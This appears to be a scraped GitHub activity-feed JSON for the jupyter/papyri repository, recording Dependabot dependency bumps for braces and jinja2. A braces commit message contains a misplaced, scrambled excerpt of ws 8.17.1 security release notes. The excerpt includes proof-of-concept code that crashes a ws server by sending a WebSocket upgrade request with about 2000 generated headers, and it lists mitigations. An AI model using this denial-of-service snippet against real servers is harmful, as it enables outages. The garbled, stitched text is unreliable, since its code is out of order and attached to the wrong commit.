{"payload":{"feedbackUrl":"https://github.com/orgs/community/discussions/53140","repo":{"id":281771398,"defaultBranch":"main","name":"papyri","ownerLogin":"jupyter","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2020-07-22T19:58:47.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/7388996?v=4","public":true,"private":false,"isOrgOwned":true},"refInfo":{"name":"","listCacheKey":"v0:1718793271.0","currentOid":""},"activityList":{"items":[{"before":null,"after":"ba8adf0e97771a8f980725ed7db485dc2ac5a1f3","ref":"refs/heads/dependabot/npm_and_yarn/papyri-lab/braces-3.0.3","pushedAt":"2024-06-19T10:34:31.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"dependabot[bot]","name":null,"path":"/apps/dependabot","primaryAvatarUrl":"https://avatars.githubusercontent.com/in/29110?s=80&v=4"},"commit":{"message":"Bump braces from 3.0.2 to 3.0.3 in /papyri-lab\n\nBumps [braces](https://github.com/micromatch/braces) from 3.0.2 to 3.0.3.\n- [Changelog](https://github.com/micromatch/braces/blob/master/CHANGELOG.md)\n- [Commits](https://github.com/micromatch/braces/compare/3.0.2...3.0.3)\n\n---\nupdated-dependencies:\n- dependency-name: braces\n dependency-type: indirect\n...\n\nSigned-off-by: dependabot[bot] Sourced from ws's\r\nreleases. A request with a number of headers exceeding\r\nthe[ const wss = new WebSocket.Server({ port: 0 }, function () {\r\nconst chars =\r\n"!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');\r\nconst headers = {};\r\nlet count = 0; for (let i = 0; i < chars.length; i++) {\r\nif (count === 2000) break; } headers.Connection = 'Upgrade';\r\nheaders.Upgrade = 'websocket';\r\nheaders['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\r\nheaders['Sec-WebSocket-Version'] = '13'; const request = http.request({\r\nheaders: headers,\r\nhost: '127.0.0.1',\r\nport: wss.address().port\r\n}); request.end();\r\n});\r\nRelease notes
\r\n\r\n
8.17.1
\r\nBug fixes
\r\n\r\n
\r\nserver.maxHeadersCount
][]\r\nthreshold could be used to crash a ws server.const http = require('http');\r\nconst WebSocket = require('ws');\r\n
\r\nfor (let j = 0; j < chars.length; j++) {\r\n const key = chars[i] + chars[j];\r\n headers[key] = 'x';\r\n\r\n if (++count === 2000) break;\r\n}\r\n
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
\r\nIn vulnerable versions of ws, the issue can be mitigated in the\r\nfollowing ways:
\r\n--max-http-header-size=size
][] and/or the\r\n[maxHeaderSize
][] options so\r\nthat no more headers than the server.maxHeadersCount
limit\r\ncan be sent.... (truncated)
\r\n\r\n3c56601
\r\n[dist] 8.17.1e55e510
\r\n[security] Fix crash when the Upgrade header cannot be read (#2231)6a00029
\r\n[test] Increase code coverageddfe4a8
\r\n[perf] Reduce the amount of crypto.randomFillSync()
\r\ncallsb73b118
\r\n[dist] 8.17.029694a5
\r\n[test] Use the highWaterMark
variable934c9d6
\r\n[ci] Test on node 221817bac
\r\n[ci] Do not test on node 2196c9b3d
\r\n[major] Flip the default value of allowSynchronousEvents
\r\n(#2221)e5f32c7
\r\n[fix] Emit at most one event per event loop iteration (#2218)?
operator work. (#379)"}},{"before":"5a0e0a7495c7ea9252d156ac0d25d6a573f4f554","after":null,"ref":"refs/heads/dependabot/pip/jinja2-3.1.3","pushedAt":"2024-01-15T09:48:04.000Z","pushType":"branch_deletion","commitsCount":0,"pusher":{"login":"Carreau","name":"M Bussonnier","path":"/Carreau","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/335567?s=80&v=4"}},{"before":"658e7121ee7791e6550a34f571cee97b2a48b22a","after":"84788dc360184f43f4ac35751d1c4378086f8309","ref":"refs/heads/main","pushedAt":"2024-01-15T09:48:03.000Z","pushType":"pr_merge","commitsCount":2,"pusher":{"login":"Carreau","name":"M Bussonnier","path":"/Carreau","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/335567?s=80&v=4"},"commit":{"message":"Bump jinja2 from 3.1.2 to 3.1.3 (#375)","shortMessageHtmlLink":"Bump jinja2 from 3.1.2 to 3.1.3 (#375)"}},{"before":null,"after":"5a0e0a7495c7ea9252d156ac0d25d6a573f4f554","ref":"refs/heads/dependabot/pip/jinja2-3.1.3","pushedAt":"2024-01-11T20:56:33.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"dependabot[bot]","name":null,"path":"/apps/dependabot","primaryAvatarUrl":"https://avatars.githubusercontent.com/in/29110?s=80&v=4"},"commit":{"message":"Bump jinja2 from 3.1.2 to 3.1.3\n\nBumps [jinja2](https://github.com/pallets/jinja) from 3.1.2 to 3.1.3.\n- [Release notes](https://github.com/pallets/jinja/releases)\n- [Changelog](https://github.com/pallets/jinja/blob/main/CHANGES.rst)\n- [Commits](https://github.com/pallets/jinja/compare/3.1.2...3.1.3)\n\n---\nupdated-dependencies:\n- dependency-name: jinja2\n dependency-type: direct:development\n...\n\nSigned-off-by: dependabot[bot]